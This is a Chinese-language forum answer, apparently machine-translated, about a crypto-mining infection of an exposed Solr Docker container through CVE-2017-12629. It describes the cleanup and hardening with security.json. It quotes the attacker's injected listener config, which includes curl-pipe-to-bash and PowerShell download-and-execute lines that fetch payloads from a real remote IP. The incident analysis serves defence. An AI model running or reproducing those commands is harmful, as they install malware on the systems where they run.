史前史:
docker。htop告诉我,用户/var/tmp/sustes的进程8983将所有内核加载到100%。试图找出什么是sustes,但是Google并没有帮助,但是8983告诉我们Solr容器中的问题。试图从v6更新Solr。到7.4并收到消息:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
站点应继续工作,回滚到v6.6.4(作为docker-hub https://hub.docker.com/_/solr/上唯一可用的v6)。
在Docker的日志中,我发现:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
因此,在http://192.99.142.226:8220/mr.sh,我们可以找到安装了加密矿工的恶意软件代码(crypto miner config:http://192.99.142.226:8220/wt.conf)。
使用链接http://example.com:8983/solr/YOUR_CORE_NAME/config可以找到完整的配置,但是现在我们只需要listener部分:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
由于我们在solrconfig.xml上没有这样的设置,所以我在/opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json上找到了这些设置(可以在http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
答案 0 :(得分:6)
修复:
清除configoverlay.json,或仅删除此文件(rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json)。
重新启动Solr(如何启动\停止-https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer)或重新启动Docker容器。
据我了解,这种攻击可能是由于CVE-2017-12629造成的:
如何使用CVE-2017-12629-https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629:从Solr中删除RunExecutableListener-https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
...并且已在v5.5.5、6.6.2 +,7.1 +
中修复这是由于任何人都可以免费使用http://example.com:8983,因此尽管此漏洞已得到修复,但还是...
创建security.json并使用:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
此文件必须放在/opt/solr/server/solr/(即solr.xml旁边)
由于Solr有自己的哈希检查器(作为sha256(密码+盐)哈希),因此无法在此处使用典型的解决方案。 Ive发现的生成哈希的最简单方法是从http://www.planetcobalt.net/sdb/solr_password_hash.shtml(在本文结尾)下载jar文件,并以java -jar SolrPasswordHash.jar NewPassword的身份运行。
因为我使用docker-compose,所以我只是像这样构建Solr:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes